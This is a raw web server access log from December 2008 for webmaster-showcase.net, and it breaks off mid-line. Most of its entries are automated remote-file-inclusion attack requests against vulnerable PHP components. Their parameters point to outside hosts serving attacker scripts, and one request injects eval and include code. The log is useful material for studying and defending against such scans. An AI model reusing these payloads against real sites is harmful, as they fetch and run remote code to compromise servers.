209.235.254.107 - - [03/Dec/2008:16:26:46 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:26:20 -0800] "GET /logs/showfile.php/access.log//skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:27:40 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 581 "-" "libwww-perl/5.811" "webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:26:20 -0800] "GET /logs/showfile.php//skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:26:27 -0800] "GET /skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 581 "-" "libwww-perl/5.811" "webmaster-showcase.net"
211.247.226.253 - - [03/Dec/2008:16:26:38 -0800] "GET /logs/showfile.php/access.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:28:22 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 581 "-" "libwww-perl/5.811" "webmaster-showcase.net"
212.95.226.66 - - [03/Dec/2008:16:29:12 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
211.43.212.56 - - [03/Dec/2008:16:27:56 -0800] "GET /logs/showfile.php/access_081110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
211.43.212.56 - - [03/Dec/2008:16:27:56 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 404 604 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
211.43.212.56 - - [03/Dec/2008:16:27:56 -0800] "GET /logs/showfile.php/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
208.109.21.239 - - [03/Dec/2008:16:29:20 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
210.219.173.249 - - [03/Dec/2008:16:30:13 -0800] "GET /logs/showfile.php/access_081102.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
62.75.209.183 - - [03/Dec/2008:16:34:02 -0800] "GET /skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 585 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
62.75.209.183 - - [03/Dec/2008:16:32:49 -0800] "GET /logs/showfile.php/access.log//skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "webmaster-showcase.net"
62.75.209.183 - - [03/Dec/2008:16:32:50 -0800] "GET /skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 581 "-" "libwww-perl/5.803" "webmaster-showcase.net"
62.75.209.183 - - [03/Dec/2008:16:32:51 -0800] "GET /logs/showfile.php//skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "webmaster-showcase.net"
211.43.212.56 - - [03/Dec/2008:16:35:02 -0800] "GET /logs/showfile.php/access_081028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
75.138.236.197 - - [03/Dec/2008:16:33:42 -0800] "GET /redcross/counter.html HTTP/1.1" 200 1046 "http://trihelp.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18" "www.webmaster-showcase.net"
195.137.143.11 - - [03/Dec/2008:16:35:37 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 601 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
195.137.143.11 - - [03/Dec/2008:16:34:18 -0800] "GET /logs/showfile.php/access_081103.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
195.137.143.11 - - [03/Dec/2008:16:34:19 -0800] "GET /logs/showfile.php/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
77.221.130.14 - - [03/Dec/2008:16:34:20 -0800] "GET /logs/showfile.php//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.webmaster-showcase.net"
77.221.130.14 - - [03/Dec/2008:16:34:21 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 605 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.webmaster-showcase.net"
77.221.130.14 - - [03/Dec/2008:16:35:42 -0800] "GET /logs/showfile.php/access_081030.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.webmaster-showcase.net"
216.69.164.106 - - [03/Dec/2008:16:35:48 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
195.137.143.11 - - [03/Dec/2008:16:35:52 -0800] "GET /?path%5Bdocroot%5D=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 686 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
195.137.143.11 - - [03/Dec/2008:16:34:32 -0800] "GET /logs/showfile.php//?path%5Bdocroot%5D=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
195.137.143.11 - - [03/Dec/2008:16:34:33 -0800] "GET /logs/showfile.php/access_081107.log//?path%5Bdocroot%5D=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
66.249.70.248 - - [03/Dec/2008:16:36:17 -0800] "GET /phpBB2/viewtopic.php?p=99337&sid=a5a33c9faa02735697938d94de873c86 HTTP/1.1" 200 23736 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.webmaster-showcase.net"
64.90.164.110 - - [03/Dec/2008:16:35:11 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
195.137.143.11 - - [03/Dec/2008:16:35:41 -0800] "GET /logs/showfile.php/access_081028.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
211.43.212.56 - - [03/Dec/2008:16:35:44 -0800] "GET /logs/showfile.php/access_081110.log%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:35:54 -0800] "GET /skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 585 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:35:54 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 585 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
69.20.70.31 - - [03/Dec/2008:16:36:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.17.253.220 - - [03/Dec/2008:16:37:23 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
77.221.130.14 - - [03/Dec/2008:16:36:20 -0800] "GET /logs/showfile.php/access_081030.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/3.0 (OS/2; U)" "www.webmaster-showcase.net"
77.221.130.14 - - [03/Dec/2008:16:36:22 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 605 "-" "Mozilla/3.0 (OS/2; U)" "www.webmaster-showcase.net"
68.109.233.157 - - [03/Dec/2008:16:37:42 -0800] "GET /logs/showfile.php/access_081030.log%20//include/write.php?dir=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "www.webmaster-showcase.net"
77.221.130.14 - - [03/Dec/2008:16:37:42 -0800] "GET /logs/showfile.php//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/3.0 (OS/2; U)" "www.webmaster-showcase.net"
62.149.226.208 - - [03/Dec/2008:16:36:34 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
77.221.130.14 - - [03/Dec/2008:16:36:39 -0800] "GET /logs/showfile.php/access_081110.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.webmaster-showcase.net"
194.72.238.37 - - [03/Dec/2008:16:37:53 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
195.190.13.242 - - [03/Dec/2008:16:38:26 -0800] "POST /gb/gbook.php?action=sign HTTP/1.0" 200 3512 "http://webmaster-showcase.net/gb/gbook.php?action=sign" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "webmaster-showcase.net"
77.221.130.14 - - [03/Dec/2008:16:40:06 -0800] "GET /logs/showfile.php/access_081110.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/3.0 (OS/2; U)" "www.webmaster-showcase.net"
209.235.254.107 - - [03/Dec/2008:16:41:46 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
84.21.71.133 - - [03/Dec/2008:16:40:36 -0800] "GET /logs/showfile.php/access_081030.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
84.21.71.133 - - [03/Dec/2008:16:41:57 -0800] "GET /logs/showfile.php//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
84.21.71.133 - - [03/Dec/2008:16:40:38 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 404 634 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
62.75.209.183 - - [03/Dec/2008:16:43:12 -0800] "GET /logs/showfile.php/access_081029.log//skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
62.75.209.183 - - [03/Dec/2008:16:41:52 -0800] "GET /skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 585 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
62.75.209.183 - - [03/Dec/2008:16:41:53 -0800] "GET /logs/showfile.php//skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.803" "www.webmaster-showcase.net"
70.85.201.66 - - [03/Dec/2008:16:43:48 -0800] "GET /logs/showfile.php/access_081104.log//components/com_simpleboard/image_upload.php?sbp=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
70.85.201.66 - - [03/Dec/2008:16:43:49 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 604 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
70.85.201.66 - - [03/Dec/2008:16:43:49 -0800] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
212.95.226.66 - - [03/Dec/2008:16:42:52 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:43:00 -0800] "GET /logs/showfile.php/access_081107.log//skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:43:01 -0800] "GET /skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 585 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:44:21 -0800] "GET /logs/showfile.php//skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
84.21.71.133 - - [03/Dec/2008:16:43:11 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.novoftp.xpg.com.br/pw.txt??? HTTP/1.1" 404 634 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
84.21.71.133 - - [03/Dec/2008:16:43:12 -0800] "GET /logs/showfile.php//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.novoftp.xpg.com.br/pw.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:44:33 -0800] "GET /logs/showfile.php/access_081107.log//skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.0" 200 1579 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:43:13 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 585 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
74.55.13.210 - - [03/Dec/2008:16:43:14 -0800] "GET /logs/showfile.php//skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "www.webmaster-showcase.net"
84.21.71.133 - - [03/Dec/2008:16:43:14 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 404 589 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
84.21.71.133 - - [03/Dec/2008:16:43:14 -0800] "GET /logs/showfile.php/access_081107.log//modules/vwar/admin/admin.php?vwar_root=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
84.21.71.133 - - [03/Dec/2008:16:43:16 -0800] "GET /logs/showfile.php//modules/vwar/admin/admin.php?vwar_root=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
89.218.85.18 - - [03/Dec/2008:16:43:31 -0800] "GET /logs/showfile.php/access_081110.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.webmaster-showcase.net"
89.218.85.18 - - [03/Dec/2008:16:43:31 -0800] "GET /logs/showfile.php//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.webmaster-showcase.net"
89.218.85.18 - - [03/Dec/2008:16:43:31 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 605 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.webmaster-showcase.net"
84.21.71.133 - - [03